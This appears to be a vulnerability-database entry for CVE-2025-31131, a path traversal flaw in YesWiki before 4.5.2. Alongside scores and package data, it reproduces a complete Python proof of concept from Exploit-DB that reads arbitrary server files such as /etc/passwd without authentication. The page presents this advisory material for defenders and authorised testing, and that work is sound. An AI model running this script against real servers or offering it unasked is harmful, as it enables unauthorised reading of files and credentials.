CVE-2025-31131

unknown

Published 2025-04-01 · Modified 2025-04-01

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Yeswiki Path Traversal vulnerability allows arbitrary read of files

Predictions

Exploit likelihood

30%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52135 webapps multiple python · 2 KB

Al Baradi Joy · 2025-04-07

YesWiki 4.5.1 - Unauthenticated Path Traversal

python exploit Source: Exploit-DB

# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-31131
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://github.com/YesWiki/yeswiki
# Affected Version: < 4.5.2
# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
# Vulnerability Type: Unauthenticated Path Traversal (LFI)
# CVSS Score: 8.6 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Description:
#   YesWiki before version 4.5.2 is vulnerable to unauthenticated path
traversal via the 'squelette' parameter.
#   A remote attacker can exploit this issue to read arbitrary files on the
server, such as /etc/passwd.

import requests
import sys

def banner():
    print("=" * 80)
    print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal
(CVE-2025-31131)")
    print(" Exploit Author: Al Baradi Joy")
    print("=" * 80)

def exploit(target, filename="/etc/passwd"):
    if not target.startswith("http"):
        target = "http://" + target

    traversal = "../" * 8
    encoded_file = filename.replace("/", "%2f")
    payload =
f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
    url = target.rstrip("/") + payload

    try:
        print(f"[+] Target: {target}")
        print(f"[+] Attempting to read: {filename}")
        response = requests.get(url, timeout=10)

        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful. File contents:\n")
            print(response.text)
        else:
            print("[!] Exploit failed or file not readable.")
            print(f"Status Code: {response.status_code}")
            if len(response.text) < 200:
                print(f"Response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    banner()
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
        print(f"Example: python3 {sys.argv[0]} http://victim.com
/etc/passwd")
        sys.exit(1)

    target_url = sys.argv[1]
    file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    exploit(target_url, file_to_read)

Package impact

Ecosystem	Package	Vulnerable	Fixed
Packagist	yeswiki/yeswiki	`<4.5.2`	`4.5.2`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.